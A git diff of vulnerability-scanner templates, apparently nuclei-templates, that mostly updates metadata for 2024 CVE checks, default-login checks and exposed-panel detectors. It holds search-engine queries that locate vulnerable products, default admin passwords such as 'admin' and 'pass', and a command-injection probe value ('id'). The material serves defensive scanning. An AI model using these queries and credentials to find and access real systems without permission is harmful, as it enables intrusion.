a/http/cves/2024/CVE-2024-25735.yaml +++ b/http/cves/2024/CVE-2024-25735.yaml @@ -20,7 +20,9 @@ info: max-request: 1 vendor: wyrestorm product: apollo vx20 - shodan-query: ssl:"WyreStorm Apollo VX20" + shodan-query: + - ssl:"WyreStorm Apollo VX20" + - ssl:"wyrestorm apollo vx20" tags: packetstorm,cve,cve2024,wyrestorm,info-leak http: diff --git a/http/cves/2024/CVE-2024-26331.yaml b/http/cves/2024/CVE-2024-26331.yaml index 749842e403..d8d5d1b9b6 100644 --- a/http/cves/2024/CVE-2024-26331.yaml +++ b/http/cves/2024/CVE-2024-26331.yaml @@ -18,7 +18,7 @@ info: verified: true max-request: 1 shodan-query: title:"ReCrystallize" - tags: cve,cve02024,recrystallize,auth-bypass + tags: cve,recrystallize,auth-bypass,cve2024 http: - method: GET diff --git a/http/cves/2024/CVE-2024-27198.yaml b/http/cves/2024/CVE-2024-27198.yaml index 6b5009efa5..0c304b3c1a 100644 --- a/http/cves/2024/CVE-2024-27198.yaml +++ b/http/cves/2024/CVE-2024-27198.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: jetbrains product: teamcity - shodan-query: http.component:"TeamCity" + shodan-query: + - http.component:"TeamCity" + - http.title:teamcity + - http.component:"teamcity" fofa-query: title=teamcity google-query: intitle:teamcity tags: cve,cve2024,teamcity,jetbrains,auth-bypass,kev diff --git a/http/cves/2024/CVE-2024-27497.yaml b/http/cves/2024/CVE-2024-27497.yaml index 4ea28ef36c..e081646a81 100644 --- a/http/cves/2024/CVE-2024-27497.yaml +++ b/http/cves/2024/CVE-2024-27497.yaml @@ -17,7 +17,7 @@ info: - https://github.com/fkie-cad/nvd-json-data-feeds classification: epss-score: 0.00053 - epss-percentile: 0.19682 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-27564.yaml b/http/cves/2024/CVE-2024-27564.yaml index 5c084baf08..65a8b04159 100644 --- a/http/cves/2024/CVE-2024-27564.yaml +++ b/http/cves/2024/CVE-2024-27564.yaml @@ -11,8 +11,8 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-27564 metadata: verified: true - max-request: 1 - fofa-query: title="ChatGPT个人专用版" + max-request: 2 + fofa-query: "title=\"ChatGPT个人专用版\"" tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi http: diff --git a/http/cves/2024/CVE-2024-29059.yaml b/http/cves/2024/CVE-2024-29059.yaml index 17e84f392e..1caaaf778a 100644 --- a/http/cves/2024/CVE-2024-29059.yaml +++ b/http/cves/2024/CVE-2024-29059.yaml @@ -23,7 +23,9 @@ info: max-request: 2 vendor: microsoft product: .net_framework - shodan-query: 'Server: MS .NET Remoting' + shodan-query: + - 'Server: MS .NET Remoting' + - "server: ms .net remoting" tags: cve,cve2024,dotnet,microsoft,remoting,deserialization http: diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml index 4caca5cfd7..eb0aa9cab6 100644 --- a/http/cves/2024/CVE-2024-3097.yaml +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -20,13 +20,16 @@ info: epss-percentile: 0.92605 cpe: cpe:2.3:a:imagely:nextgen_gallery:*:*:*:*:*:wordpress:*:* metadata: + max-request: 1 vendor: imagely - product: nextgen_gallery + product: "nextgen_gallery" framework: wordpress + shodan-query: + - "cpe:\"cpe:2.3:a:imagely:nextgen_gallery\"" + - http.html:/wp-content/plugins/nextgen-gallery/ + fofa-query: "body=/wp-content/plugins/nextgen-gallery/" publicwww-query: "/wp-content/plugins/nextgen-gallery/" - shodan-query: cpe:"cpe:2.3:a:imagely:nextgen_gallery" - fofa-query: body=/wp-content/plugins/nextgen-gallery/ - tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak + tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak,imagely http: - method: GET diff --git a/http/cves/2024/CVE-2024-31621.yaml b/http/cves/2024/CVE-2024-31621.yaml index 6adada63e3..074b6646ff 100644 --- a/http/cves/2024/CVE-2024-31621.yaml +++ b/http/cves/2024/CVE-2024-31621.yaml @@ -10,6 +10,9 @@ info: - https://www.exploit-db.com/exploits/52001 - https://github.com/FlowiseAI/Flowise/releases - https://flowiseai.com/ + classification: + epss-score: 0.00381 + epss-percentile: 0.72907 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-31848.yaml b/http/cves/2024/CVE-2024-31848.yaml index e05cb2e160..be4a41b369 100644 --- a/http/cves/2024/CVE-2024-31848.yaml +++ b/http/cves/2024/CVE-2024-31848.yaml @@ -21,8 +21,8 @@ info: epss-percentile: 0.21518 metadata: verified: true - max-request: 1 - shodan-query: title:"CData - API Server" + max-request: 2 + shodan-query: "title:\"CData - API Server\"" tags: cve,cve2024,cdata,lfi flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index 7b52a6f010..f3cfac9d3d 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -21,8 +21,8 @@ info: epss-percentile: 0.21091 metadata: verified: true - max-request: 1 - shodan-query: title:"CData Connect" + max-request: 2 + shodan-query: "title:\"CData Connect\"" tags: cve,cve2024,cdata,lfi flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-31850.yaml b/http/cves/2024/CVE-2024-31850.yaml index 5b2aef20bb..5305128715 100644 --- a/http/cves/2024/CVE-2024-31850.yaml +++ b/http/cves/2024/CVE-2024-31850.yaml @@ -19,8 +19,8 @@ info: epss-percentile: 0.21091 metadata: verified: true - max-request: 1 - shodan-query: title:"CData Arc" + max-request: 2 + shodan-query: "title:\"CData Arc\"" tags: cve,cve2024,cdata,lfi flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-31851.yaml b/http/cves/2024/CVE-2024-31851.yaml index e057749cbf..f4a5a8d55b 100644 --- a/http/cves/2024/CVE-2024-31851.yaml +++ b/http/cves/2024/CVE-2024-31851.yaml @@ -14,14 +14,13 @@ info: cvss-score: 8.6 cve-id: CVE-2024-31851 cwe-id: CWE-22 - epss-score: 0.00044 - epss-percentile: 0.09773 + epss-score: 0.00054 + epss-percentile: 0.21518 metadata: verified: true - max-request: 1 - shodan-query: title:"CData Sync" + max-request: 2 + shodan-query: "title:\"CData Sync\"" tags: cve,cve2024,cdata,lfi - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-32640.yaml b/http/cves/2024/CVE-2024-32640.yaml index 3a719ded91..fb7ccca466 100644 --- a/http/cves/2024/CVE-2024-32640.yaml +++ b/http/cves/2024/CVE-2024-32640.yaml @@ -18,7 +18,9 @@ info: max-request: 1 vendor: masacms product: masacms - shodan-query: 'Generator: Masa CMS' + shodan-query: + - 'Generator: Masa CMS' + - "generator: masa cms" tags: cve,cve2024,sqli,cms,masa,masacms http: diff --git a/http/cves/2024/CVE-2024-32651.yaml b/http/cves/2024/CVE-2024-32651.yaml index 1a2deb2d94..1a3315eb7e 100644 --- a/http/cves/2024/CVE-2024-32651.yaml +++ b/http/cves/2024/CVE-2024-32651.yaml @@ -16,8 +16,8 @@ info: cvss-score: 10 cve-id: CVE-2024-32651 cwe-id: CWE-1336 - epss-score: 0.00045 - epss-percentile: 0.14322 + epss-score: 0.00065 + epss-percentile: 0.28259 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml index 459f1a577c..bb24109108 100644 --- a/http/cves/2024/CVE-2024-3273.yaml +++ b/http/cves/2024/CVE-2024-3273.yaml @@ -16,14 +16,15 @@ info: cvss-score: 9.8 cve-id: CVE-2024-3273 cwe-id: CWE-77 + cpe: cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:* epss-score: 0.83361 epss-percentile: 0.98438 - cpe: cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:* metadata: verified: true vendor: dlink - product: dns-320l_firmware - fofa-query: app="D_Link-DNS-ShareCenter" + product: "dns-320l_firmware" + fofa-query: "app=\"D_Link-DNS-ShareCenter\"" + max-request: 1 tags: cve,cve2024,dlink,nas,kev variables: cmd: "id" diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml index b24121f056..e125e8a9cc 100644 --- a/http/cves/2024/CVE-2024-33575.yaml +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -19,13 +19,14 @@ info: epss-score: 0.00053 epss-percentile: 0.21091 metadata: - vendor: User Meta - product: User Meta + max-request: 1 + vendor: "User Meta" + product: "User Meta" framework: wordpress + shodan-query: "http.html:/wp-content/plugins/user-meta/" + fofa-query: "body=/wp-content/plugins/user-meta/" publicwww-query: "/wp-content/plugins/user-meta/" - shodan-query: http.html:/wp-content/plugins/user-meta/ - fofa-query: body=/wp-content/plugins/user-meta/ - tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak + tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak,User Meta http: - method: GET diff --git a/http/cves/2024/CVE-2024-33724.yaml b/http/cves/2024/CVE-2024-33724.yaml index c7cf477b96..cde00d75c5 100644 --- a/http/cves/2024/CVE-2024-33724.yaml +++ b/http/cves/2024/CVE-2024-33724.yaml @@ -14,7 +14,9 @@ info: max-request: 2 vendor: soplanning product: soplanning - shodan-query: html:"soplanning" + shodan-query: + - html:"soplanning" + - http.html:"soplanning" fofa-query: body="soplanning" tags: packetstorm,cve,cve2024,authenticated,soplanning,xss diff --git a/http/cves/2024/CVE-2024-3400.yaml b/http/cves/2024/CVE-2024-3400.yaml index 5b916b447f..e7d578bcf0 100644 --- a/http/cves/2024/CVE-2024-3400.yaml +++ b/http/cves/2024/CVE-2024-3400.yaml @@ -22,12 +22,15 @@ info: cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:-:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 3 vendor: paloaltonetworks - product: pan-os - shodan-query: http.favicon.hash:-631559155 - fofa-query: icon_hash="-631559155" - tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev,intrusive + product: "pan-os" + shodan-query: + - "http.favicon.hash:-631559155" + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" + fofa-query: "icon_hash=\"-631559155\"" + tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev,intrusive,paloaltonetworks http: - raw: diff --git a/http/cves/2024/CVE-2024-34470.yaml b/http/cves/2024/CVE-2024-34470.yaml index f61ad1d0e7..aedfed7ed9 100644 --- a/http/cves/2024/CVE-2024-34470.yaml +++ b/http/cves/2024/CVE-2024-34470.yaml @@ -19,7 +19,7 @@ info: epss-percentile: 0.0866 metadata: verified: true - max-request: 1 + max-request: 2 fofa-query: "mailinspector/public" tags: cve,cve2024,lfi,mailinspector,hsc diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml index 701c9b23f8..ec21ffbb89 100644 --- a/http/cves/2024/CVE-2024-3822.yaml +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -1,28 +1,28 @@ id: CVE-2024-3822 -info: - name: Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting - author: omranisecurity - severity: medium - description: | - The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. - reference: | - - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ - - https://nvd.nist.gov/vuln/detail/CVE-2024-3822 - - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N - cvss-score: 6.5 - cve-id: CVE-2024-3822 - cwe-id: CWE-79 - epss-score: 0.00043 - epss-percentile: 0.0866 - metadata: - verified: true - max-request: 1 - fofa-query: "wp-content/plugins/base64-encoderdecoder/" - tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder - +info: + name: Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting + author: omranisecurity + severity: medium + description: | + The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + reference: | + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-3822 + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-3822 + cwe-id: CWE-79 + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + verified: true + max-request: 1 + fofa-query: "wp-content/plugins/base64-encoderdecoder/" + tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder + http: - method: GET path: diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index d821c13c56..0b82cbea2a 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -25,11 +25,13 @@ info: cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 2 + max-request: 5 vendor: crushftp product: crushftp - shodan-query: html:"CrushFTP" - fofa-query: body="crushftp" + shodan-query: + - "html:\"CrushFTP\"" + - http.html:"crushftp" + fofa-query: "body=\"crushftp\"" tags: cve,cve2024,lfr,crushftp,vfs,kev flow: | if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) { diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index b4e1655549..fd4b518a60 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 2 shodan-query: html:"osCommerce" - tags: packetstorm,xss,rxss,oscommerce + tags: packetstorm,xss,rxss,oscommerce,cve2024,cve http: - method: GET diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 031ce07c3b..c4bc18267d 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -13,11 +13,10 @@ info: - https://github.com/sinsinology/CVE-2024-4358 - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 metadata: - shodan-query: title:"Log in | Telerik Report Server" verified: true max-request: 2 + shodan-query: title:"Log in | Telerik Report Server" tags: cve,cve2024,telerik,progress,auth-bypass,instrusive - variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index 8b34fb7f1f..d75eb1260b 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -24,8 +24,10 @@ info: max-request: 1 vendor: sonatype product: nexus - fofa-query: title="Nexus Repository Manager" - tags: cve,cve2024,nexus,lfi + fofa-query: + - title="Nexus Repository Manager" + - title="nexus repository manager" + tags: cve,cve2024,nexus,lfi,sonatype http: - method: GET diff --git a/http/default-logins/3com/3Com-wireless-default-login.yaml b/http/default-logins/3com/3Com-wireless-default-login.yaml index 321a07e084..ff639e033e 100644 --- a/http/default-logins/3com/3Com-wireless-default-login.yaml +++ b/http/default-logins/3com/3Com-wireless-default-login.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.speedguide.net/routers/3com-wl-546-3com-wireless-8760-dual-radio-11abg-1256 metadata: - max-request: 1 - fofa-query: title="3COM" + max-request: 2 + fofa-query: "title=\"3COM\"" tags: default-login,3com http: diff --git a/http/default-logins/ampjuke-default-login.yaml b/http/default-logins/ampjuke-default-login.yaml index 7cba568c40..1eb6139034 100644 --- a/http/default-logins/ampjuke-default-login.yaml +++ b/http/default-logins/ampjuke-default-login.yaml @@ -5,10 +5,10 @@ info: author: ritikchaddha severity: high description: | - AmpJuke contains a default login vulnerability. Default admin login password 'pass' was found. + AmpJuke contains a default login vulnerability. Default admin login password 'pass' was found. metadata: - max-request: 2 - shodan-query: http.favicon.hash:-121681558 + max-request: 3 + shodan-query: "http.favicon.hash:-121681558" tags: default-login,ampjuke http: diff --git a/http/default-logins/asus/asus-rtn16-default-login.yaml b/http/default-logins/asus/asus-rtn16-default-login.yaml index 6e555fad8a..2ebca97d0b 100644 --- a/http/default-logins/asus/asus-rtn16-default-login.yaml +++ b/http/default-logins/asus/asus-rtn16-default-login.yaml @@ -5,11 +5,11 @@ info: author: ritikchaddha severity: high description: | - ASUS RT-N16 contains a default login vulnerability. Default admin login password 'admin' was found. + ASUS RT-N16 contains a default login vulnerability. Default admin login password 'admin' was found. metadata: + verified: true max-request: 1 shodan-query: "RT-N16" - verified: true tags: default-login,asus,rt-n16 http: diff --git a/http/default-logins/asus/asus-wl500g-default-login.yaml b/http/default-logins/asus/asus-wl500g-default-login.yaml index 1e874faedb..15637088ad 100644 --- a/http/default-logins/asus/asus-wl500g-default-login.yaml +++ b/http/default-logins/asus/asus-wl500g-default-login.yaml @@ -5,11 +5,11 @@ info: author: ritikchaddha severity: high description: | - ASUS WL-500 contains a default login vulnerability. Default admin login password 'admin' was found. + ASUS WL-500 contains a default login vulnerability. Default admin login password 'admin' was found. metadata: + verified: true max-request: 1 shodan-query: "WL-500G" - verified: true tags: default-login,asus,wl-500 http: diff --git a/http/default-logins/asus/asus-wl520GU-default-login.yaml b/http/default-logins/asus/asus-wl520GU-default-login.yaml index a972e1e1c2..5fa19cc132 100644 --- a/http/default-logins/asus/asus-wl520GU-default-login.yaml +++ b/http/default-logins/asus/asus-wl520GU-default-login.yaml @@ -5,11 +5,11 @@ info: author: ritikchaddha severity: high description: | - ASUS WL-520GU contains a default login vulnerability. The default admin login password 'admin' was found. + ASUS WL-520GU contains a default login vulnerability. The default admin login password 'admin' was found. metadata: + verified: true max-request: 1 shodan-query: "WL-520GU" - verified: true tags: default-login,asus,wl-520gu http: diff --git a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml index eeacaeb7fa..de7bd52229 100644 --- a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml +++ b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -8,8 +8,8 @@ info: Cambium Networks / Motorola Canopy 5750AP ADVANTAGE Access Point 5.7GHz login credentials were discovered. metadata: verified: true - max-request: 1 - fofa-query: title="Welcome to Canopy" + max-request: 2 + fofa-query: "title=\"Welcome to Canopy\"" tags: default-login,cambium,canopy http: diff --git a/http/default-logins/crushftp/crushftp-anonymous-login.yaml b/http/default-logins/crushftp/crushftp-anonymous-login.yaml index e768a596a1..df62621678 100644 --- a/http/default-logins/crushftp/crushftp-anonymous-login.yaml +++ b/http/default-logins/crushftp/crushftp-anonymous-login.yaml @@ -7,10 +7,10 @@ info: description: | CrushFTP Anonymous login credentials were discovered. metadata: - shodan-query: html:"CrushFTP" verified: true max-request: 2 - tags: default-logins,anonymous,crushftp + shodan-query: html:"CrushFTP" + tags: default-logins,anonymous,crushftp,default-login http: - raw: diff --git a/http/default-logins/crushftp/crushftp-default-login.yaml b/http/default-logins/crushftp/crushftp-default-login.yaml index 4528994223..6fc4e57c36 100644 --- a/http/default-logins/crushftp/crushftp-default-login.yaml +++ b/http/default-logins/crushftp/crushftp-default-login.yaml @@ -7,9 +7,9 @@ info: description: | CrushFTP default login credentials were discovered. metadata: - shodan-query: html:"CrushFTP" verified: true max-request: 2 + shodan-query: html:"CrushFTP" tags: default-login,crushftp http: diff --git a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml index d5ad80f909..07fb4f6937 100644 --- a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml +++ b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml @@ -10,8 +10,9 @@ info: - https://digitalwatchdog.happyfox.com/kb/article/686-recorder-and-raid-default-login-list/ metadata: verified: true - shodan-query: http.favicon.hash:868509217 - fofa-query: icon_hash="868509217" + max-request: 8 + shodan-query: "http.favicon.hash:868509217" + fofa-query: "icon_hash=\"868509217\"" tags: digital-watchdog,default-login,dw-Spectrum http: diff --git a/http/default-logins/next-terminal/next-terminal-default-login.yaml b/http/default-logins/next-terminal/next-terminal-default-login.yaml index fd94360b85..1e5d1c9dff 100644 --- a/http/default-logins/next-terminal/next-terminal-default-login.yaml +++ b/http/default-logins/next-terminal/next-terminal-default-login.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/dushixiang/next-terminal metadata: + verified: true max-request: 1 fofa-query: title="Next Terminal" - verified: true tags: default-login,next-terminal,next http: diff --git a/http/default-logins/pentaho/pentaho-default-login.yaml b/http/default-logins/pentaho/pentaho-default-login.yaml index 11b51557b7..3498eacd35 100644 --- a/http/default-logins/pentaho/pentaho-default-login.yaml +++ b/http/default-logins/pentaho/pentaho-default-login.yaml @@ -14,6 +14,8 @@ info: metadata: max-request: 1 shodan-query: pentaho + product: vantara_pentaho + vendor: hitachi tags: pentaho,default-login http: diff --git a/http/default-logins/soplanning/soplanning-default-login.yaml b/http/default-logins/soplanning/soplanning-default-login.yaml index 817121268f..7e628a37e3 100644 --- a/http/default-logins/soplanning/soplanning-default-login.yaml +++ b/http/default-logins/soplanning/soplanning-default-login.yaml @@ -13,7 +13,10 @@ info: max-request: 1 vendor: soplanning product: soplanning - shodan-query: html:"soplanning" + shodan-query: + - html:"soplanning" + - http.html:"soplanning" + fofa-query: body="soplanning" tags: soplanning,default-login http: diff --git a/http/default-logins/structurizr/structurizr-default-login.yaml b/http/default-logins/structurizr/structurizr-default-login.yaml index fb0db3fe69..a27eae52ac 100644 --- a/http/default-logins/structurizr/structurizr-default-login.yaml +++ b/http/default-logins/structurizr/structurizr-default-login.yaml @@ -12,6 +12,9 @@ info: verified: true max-request: 3 shodan-query: http.favicon.hash:1199592666 + product: on-premises_installation + vendor: structurizr + fofa-query: icon_hash=1199592666 tags: structurizr,default-login http: diff --git a/http/default-logins/timekeeper/timekeeper-default-login.yaml b/http/default-logins/timekeeper/timekeeper-default-login.yaml index 8fc8bb40d7..f7155cda24 100644 --- a/http/default-logins/timekeeper/timekeeper-default-login.yaml +++ b/http/default-logins/timekeeper/timekeeper-default-login.yaml @@ -12,6 +12,9 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:2134367771 + product: timekeeper + vendor: fsmlabs + fofa-query: icon_hash=2134367771 tags: timekeeper,default-login http: diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml index 2f31694d0f..550b41dad8 100644 --- a/http/default-logins/wazuh-default-login.yaml +++ b/http/default-logins/wazuh-default-login.yaml @@ -12,8 +12,8 @@ info: - https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment metadata: verified: true - max-request: 6 - shodan-query: title:"Wazuh" + max-request: 7 + shodan-query: "title:\"Wazuh\"" tags: wazuh,default-login http: diff --git a/http/default-logins/xxljob/xxljob-default-login.yaml b/http/default-logins/xxljob/xxljob-default-login.yaml index ae2e65c308..25015851a7 100644 --- a/http/default-logins/xxljob/xxljob-default-login.yaml +++ b/http/default-logins/xxljob/xxljob-default-login.yaml @@ -15,6 +15,9 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:1691956220 + product: xxl-job + vendor: xuxueli + fofa-query: icon_hash=1691956220 tags: default-login,xxljob http: diff --git a/http/default-logins/zabbix/zabbix-default-login.yaml b/http/default-logins/zabbix/zabbix-default-login.yaml index 0f957d6459..6da48b963c 100644 --- a/http/default-logins/zabbix/zabbix-default-login.yaml +++ b/http/default-logins/zabbix/zabbix-default-login.yaml @@ -12,7 +12,7 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 + max-request: 2 tags: zabbix,default-login http: diff --git a/http/exposed-panels/3cx-phone-management-panel.yaml b/http/exposed-panels/3cx-phone-management-panel.yaml index 2a0e1a613a..3c0392dcb7 100644 --- a/http/exposed-panels/3cx-phone-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-management-panel.yaml @@ -14,13 +14,22 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:3cx:3cx:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"3CX Phone System Management Console" max-request: 1 + vendor: 3cx product: 3cx shodan-query: - http.title:"3CX Phone System Management Console" - http.favicon.hash:970132176 - vendor: 3cx + - http.title:"3cx webclient" + - http.title:"3cx phone system management console" + google-query: + - intitle:"3CX Phone System Management Console" + - intitle:"3cx phone system management console" + - intitle:"3cx webclient" + fofa-query: + - icon_hash=970132176 + - title="3cx phone system management console" + - title="3cx webclient" tags: panel,3cx http: diff --git a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml index 9b2a5c4d3e..a89d3de0d1 100644 --- a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml @@ -14,11 +14,22 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:3cx:3cx:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"3CX Webclient" max-request: 1 - product: 3cx - shodan-query: http.title:"3CX Webclient" vendor: 3cx + product: 3cx + shodan-query: + - http.title:"3CX Webclient" + - http.title:"3cx webclient" + - http.title:"3cx phone system management console" + - http.favicon.hash:970132176 + google-query: + - intitle:"3CX Webclient" + - intitle:"3cx phone system management console" + - intitle:"3cx webclient" + fofa-query: + - icon_hash=970132176 + - title="3cx phone system management console" + - title="3cx webclient" tags: panel,3cx http: diff --git a/http/exposed-panels/acemanager-login.yaml b/http/exposed-panels/acemanager-login.yaml index 9ab19d6a3b..aea1a4edc6 100644 --- a/http/exposed-panels/acemanager-login.yaml +++ b/http/exposed-panels/acemanager-login.yaml @@ -9,10 +9,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sierrawireless:airlink_mobility_manager:*:*:*:*:*:*:*:* metadata: - fofa-query: app="ACEmanager" max-request: 1 - product: airlink_mobility_manager vendor: sierrawireless + product: airlink_mobility_manager + fofa-query: + - app="ACEmanager" + - app="acemanager" tags: panel,login,tech,acemanager,sierrawireless http: diff --git a/http/exposed-panels/acenet-panel.yaml b/http/exposed-panels/acenet-panel.yaml index 1e1d7774d8..19ea69fdea 100644 --- a/http/exposed-panels/acenet-panel.yaml +++ b/http/exposed-panels/acenet-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDk severity: info metadata: - fofa-query: body="Login @ Reporter" max-request: 1 shodan-query: http.favicon.hash:-1595726841 + fofa-query: body="Login @ Reporter" tags: panel,login,acenet,acereporter http: diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml index 4a56df4878..075097244e 100644 --- a/http/exposed-panels/ackee-panel.yaml +++ b/http/exposed-panels/ackee-panel.yaml @@ -1,20 +1,20 @@ id: ackee-panel -info: - name: Ackee Panel - Detect - author: userdehghani - severity: info - description: | - self-hosted, node.js based analytics tool for those who care about privacy. - reference: - - https://ackee.electerious.com/ - - https://docs.ackee.electerious.com/ - metadata: - verified: true - max-request: 2 - shodan-query: http.favicon.hash:-1495233116 - tags: panel,ackee,login,detect - +info: + name: Ackee Panel - Detect + author: userdehghani + severity: info + description: | + self-hosted, node.js based analytics tool for those who care about privacy. + reference: + - https://ackee.electerious.com/ + - https://docs.ackee.electerious.com/ + metadata: + verified: true + max-request: 2 + shodan-query: http.favicon.hash:-1495233116 + tags: panel,ackee,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/acrolinx-dashboard.yaml b/http/exposed-panels/acrolinx-dashboard.yaml index aef9394078..5cd589e7ae 100644 --- a/http/exposed-panels/acrolinx-dashboard.yaml +++ b/http/exposed-panels/acrolinx-dashboard.yaml @@ -10,10 +10,10 @@ info: classification: cwe-id: CWE-200 metadata: - fofa-query: title=="Acrolinx Dashboard" - google-query: inurl:"Acrolinx Dashboard" max-request: 1 shodan-query: http.title:"Acrolinx Dashboard" + fofa-query: title=="Acrolinx Dashboard" + google-query: inurl:"Acrolinx Dashboard" tags: acrolinx,panel http: diff --git a/http/exposed-panels/acti-panel.yaml b/http/exposed-panels/acti-panel.yaml index 0ed0743974..a642e64f7e 100644 --- a/http/exposed-panels/acti-panel.yaml +++ b/http/exposed-panels/acti-panel.yaml @@ -5,10 +5,10 @@ info: author: DhiyaneshDk severity: info metadata: - fofa-query: app="ACTi-视频监控" + verified: true max-request: 1 shodan-query: title:"Web Configurator" html:"ACTi" - verified: true + fofa-query: app="ACTi-视频监控" tags: acti,panel,login,detect http: diff --git a/http/exposed-panels/active-admin-exposure.yaml b/http/exposed-panels/active-admin-exposure.yaml index f8f370d602..d23836b80d 100644 --- a/http/exposed-panels/active-admin-exposure.yaml +++ b/http/exposed-panels/active-admin-exposure.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:activeadmin:activeadmin:*:*:*:*:ruby:*:*:* metadata: max-request: 1 - product: activeadmin vendor: activeadmin + product: activeadmin tags: panel,activeadmin http: diff --git a/http/exposed-panels/activemq-panel.yaml b/http/exposed-panels/activemq-panel.yaml index 14fcf8c1d5..46ad98de97 100644 --- a/http/exposed-panels/activemq-panel.yaml +++ 